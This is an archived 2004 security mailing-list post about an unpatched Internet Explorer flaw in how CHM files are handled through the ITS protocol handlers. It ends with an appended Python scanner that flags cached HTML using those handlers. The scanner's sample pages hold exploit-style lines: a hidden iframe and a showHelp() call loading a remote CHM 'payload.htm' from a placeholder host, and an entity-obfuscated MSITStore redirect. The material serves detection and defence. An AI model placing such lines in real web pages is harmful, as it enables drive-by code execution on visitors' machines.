[Dshield] An unfixed highly critical vulnerability discovered in Microsoft Internet Explorer

Peter Stendahl-Juvonen peter.stendahl-juvonen at welho.com
Thu Apr 8 13:15:52 GMT 2004

An unfixed highly critical vulnerability discovered in Microsoft
Internet Explorer


Wanted to ensure everyone concerned (MS IE 5.01, 5.5 and 6 users) on
this list is aware of this unfixed critical vulnerability:

Microsoft Internet Explorer does not properly validate source of CHM
components referenced by ITS protocol handlers

Overview: Microsoft Internet Explorer (IE) does not adequately validate
the source of script contained in compiled help (CHM) file components
that are referenced by the Microsoft InfoTech Storage (ITS) protocol
handlers. An attacker could exploit this vulnerability to execute script
in different security domains. By causing script to be run in the Local
Machine Zone, the attacker could execute arbitrary code with the
privileges of the user running IE.


AU-2004.007 -- AusCERT Update - Vulnerability in Internet Explorer
Allows Program Execution


Internet Explorer showHelp() Restriction Bypass Vulnerability

Critical: Highly critical 
Impact: Security Bypass
Where: From remote
Software: Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6


When I visited Secunia's web page (at the above address), I received the
following virus alert (issued by NAV2004):

Source: C:\Documents and Settings\username\Local Settings\Temporary
Internet Files\Content.IE5\0LU1UHY7\10523[1].htm 
Click for more information about this threat: Bloodhound.Exploit.6

Guess this is just Secunia's way of demonstrating the vulnerability's
existence on browsers concerned.

Since the virus was detected in the browser's cache, access to the infected
file was denied and repair failed. After closing the browser, however, a scan
of Temporary Internet Files showed NO threats.



Bloodhound.Exploit.6 is a heuristic detection for exploits of a
Microsoft Internet Explorer vulnerability, which was discovered in
February 2004. 

The vulnerability results from the incorrect handling of HTML files
embedded in CHM files. (CHM is the Microsoft-compiled HTML help format.)

This vulnerability is known to be used in the wild.


- Pete

               "When we thought that we had all the answers,
                   suddenly all the questions changed." 
               Mario Benedetti (1920); Uruguayan writer.
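The alert Pete describes came from a heuristic signature on a cached .htm file. As an added illustration (my own example, not code from the post, from Secunia, or from Symantec's Bloodhound engine), the script below shows the kind of content heuristic a practitioner could run over browser-cache or proxy-captured HTML to flag pages that reach into .chm content through the ITS protocol handlers (its:, ms-its:, ms-itss:, mk:@MSITStore:) or call showHelp(). It decodes HTML entities and percent-encoding first, because pages of this kind commonly hide the handler name that way. The three sample pages are constructed for the example; the hostnames and file names in them are placeholders, not real exploit sites.

```python
import html
import re
from urllib.parse import unquote

# Protocol-handler prefixes that route a URL through the InfoTech Storage
# (ITS) handlers. Any of them can address a component inside a .chm file,
# using the "file.chm::/page.htm" path syntax.
ITS_URL_RE = re.compile(
    r"(?<![a-z-])(?:ms-itss?:|its:|mk:@msitstore:)[^\s'\"<>)]+"
)
# window.showHelp("...") is the other route the advisories name.
SHOWHELP_RE = re.compile(r"\bshowhelp\s*\(")

# Constructed sample pages (not from the original post). "benign.htm" merely
# links to a .chm download; the other two reference .chm contents through an
# ITS handler, the third with the "@" entity-encoded to dodge naive matching.
SAMPLES = {
    "benign.htm": (
        "<html><body><a href='http://example.com/help.chm'>help</a>"
        "</body></html>"
    ),
    "suspicious.htm": (
        "<html><body>"
        "<iframe src='ms-its:http://example.com/x.chm::/payload.htm'"
        " width=0 height=0></iframe>"
        "<script>window.showHelp("
        "'ms-its:http://example.com/x.chm::/payload.htm');</script>"
        "</body></html>"
    ),
    "obfuscated.htm": (
        "<html><body><script>"
        "location.href='mk:&#64;MSITStore:http://example.com/x.chm::/p.htm';"
        "</script></body></html>"
    ),
}


def normalize(raw: str) -> str:
    """Undo entity and percent encoding and lower-case the page so the
    handler names match regardless of how they were written."""
    return unquote(html.unescape(raw)).lower()


def scan_html(raw: str) -> dict:
    """Return the ITS URLs found, whether showHelp() is called, how many
    '.chm' mentions there are, and a verdict. Any ITS-handler URL or
    showHelp() call marks the page as suspicious."""
    text = normalize(raw)
    its_urls = ITS_URL_RE.findall(text)
    showhelp = bool(SHOWHELP_RE.search(text))
    chm_refs = text.count(".chm")
    verdict = "suspicious" if (its_urls or showhelp) else "clean"
    return {
        "its_urls": its_urls,
        "showhelp": showhelp,
        "chm_refs": chm_refs,
        "verdict": verdict,
    }


def scan_cache(files: dict) -> dict:
    """Map each cached file name to its verdict."""
    return {name: scan_html(body)["verdict"] for name, body in files.items()}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        result = scan_html(body)
        print(f"{name}: {result['verdict']}")
        for url in result["its_urls"]:
            print(f"  ITS reference: {url}")
        if result["showhelp"]:
            print("  calls showHelp()")
```

This is a heuristic, like the Bloodhound detection in the post: a legitimate page that opens a local help file through ms-its: will trip it, so treat a hit as a reason to pull the file for a look rather than as proof of exploitation. A plain link to a .chm download (the "benign.htm" case) is deliberately not flagged, since that alone does not exercise the ITS handlers.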
